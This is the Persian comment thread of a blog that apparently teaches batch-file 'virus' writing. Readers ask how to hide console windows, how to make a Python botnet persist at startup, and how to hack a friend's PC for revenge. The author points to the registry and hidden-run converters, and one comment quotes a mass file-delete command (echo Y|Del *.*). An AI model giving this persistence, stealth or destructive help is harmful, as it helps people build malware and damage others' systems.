    دارم نرم افزار با پایتون میزنم فعلا برای اینکه سرعتش بره بالا نیاز دارم استارتاپ باشه و همچنین چیزی نمایش نده. یه چیزی مثل همون --noconsole توی exe کردن فایل پایتونی باشه

    ممنون

    Virus32 ولم کنید (: :
    اینجا باید از نرم افزاری به نام bat to exe converter استفاده کنیم
    و در تب آخر گزینه ی مخفی اجرا شود را بزنیم.

    سلام ی بات نت با پایتون۳ نوشم تو قسمتی ک بتونه خودشو تو استارتاپ بزاره مشکل دارم..

    ی راهش اینه ک بیام برنامه ک اجرا شد ی کپی از خودش درست کنه کپیو بفرسته به مسیر استارتاپ  ی راهش ب نظرم اینه میشه ی فایل بت درست کنه ک ب مسیر خودش اشاره کنه و اونو انتقال بده به استارتاپ ... ب نظر تو کدومش عاقلانه تر و شدنی تره؟... ی مثال ساده هم از هرکدوم ک بنظرت بهتره بهم میدی؟

    مرسی منتظر ایمیلتون هستم :*)

    Virus32 ولم کنید (: :
    از ریجیستری برو

    سلام ویروس کارت خیلی خوبه کلی باهات حال کردم 

    فقط یه سوال دارم

    اگراطلاعات آی پی کانفیگ یه سیستم رو داشته باشی چطوری میشه بهش متصل بی؟

    Virus32 Virus 32 :
    سلام عزیز اختیار داری
    اگه تو یه شبکه باشین میشه بهش متصل شد
    اگه امنیتش پایین باشه میتونی خود آی پی رو مستقیم تو مرورگرت بزنی و ....
    اگه نه باید از ابزار ها کمک بگیری

    سلام

     چرا اینجا اینقدر چرند نوشتی؟

    تو اصلا  میدونی ویروس چیه؟

    یه برنامه ساده‌‌ی که توی  حافظه  مقیم نمیشه   و سیستم رو  با استارآپ شات داون کنه که ویروس نیست داداش من... اینقدر با این چرت و پرتهات  بچه‌‌ها رو تحمیق نکن

    Virus32 ولم کنید (: :
    (:

    سلام 

     

    ببخشید چه دستوری بزنم که در هنگام اجرا شدن اسکریپتم صفحه ی cmd به کاربر نمایش داده نشه

    Virus32 Ax0o 32 :
    تو کامنتا هس یه نگاه بنداز

    سلام داداش من کلا از ویروس نویسی چیزی نمی دونم یکی از دوستام سیستمم رو با ویروس کلا سوزونده می خوام بدونم من چطور می تونم تلافی کارشو در بیارم لطفا به منم از اون ویروس ها بده تا منم سیستم اونو به هم بریزم طوری که ببره تعمیرگاه ممنون

     

    Virus32 32 Attacker ‌ :
    توو وب چرخ بزن پست های زیادی هست، برای اینکار باید بشینی برنامه نویسی یاد بگیری :(

    سلام

    یه سوال

    تو کد 

    echo Y|Del *.*

    اون y بعد از echo چیکار میکنه؟

    بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است

    سلام ویروس جان یه سوال داشتم میشه توی دارک وب یه سایت بزنی برای اموزش هایی که ****** ********* **** ***** *** ** ****** *** اجازه نمیده بزاری بزنی

    Virus32 Ax0o 32 :
    بهش فکر میکنیم!

    سلام

    عاغا دوتا سوال

    اول اینکه توی if ها میشه بگی اگه متغیر a جواب مثلا کد net user نبود اینکارو بکن؟

    و دوم اینکه چجور میشه بگی اگه جواب همون a خالی بود اینکارو بکن؟

    سلام آموزش خوب بود به دردم خورد

    سلام

    توی اون کد آخری بنظرم باید بجای r از s استفاده کنی

    چون r میاد سیستم رو ریستارت میکنه و در نتیجه دوباره روشن میشه

    Virus32 Virus 32 :
    سلام
    بله کاملا درسته
    میشه s هم گذاشت

    سلام 

    با استفاده از دستور if میشه توضیح بدید که اگر یک فایل در مسیر خاص بود برنامه اجرا بشه در غیر اینصورت برنامه بسته بشه (در داخل تایمر بنویسید که زود زود چک کنه!).

    Virus32 Virus 32 :
    سلام
    با بت؟ نمیخوایین بیخیال این زبون بسته بشین؟ یکم حرفه ای تر شین خواهشن :(
    echo off
    :a
    if exist D:\Virus32\ (
    echo yes
    ) else (
    echo No
    )
    timeout /t 2
    goto a
    هر دو ثانیه چک میکنه پوشه ویروس32 سرجاشه یا نه
    پیام yes/no میده
    تست کن .... اوکی بود ... بجاش از دستور exit استفاده کن.
    ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
    شما میتوانید از این تگهای html استفاده کنید:
    <b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
    تجدید کد امنیتی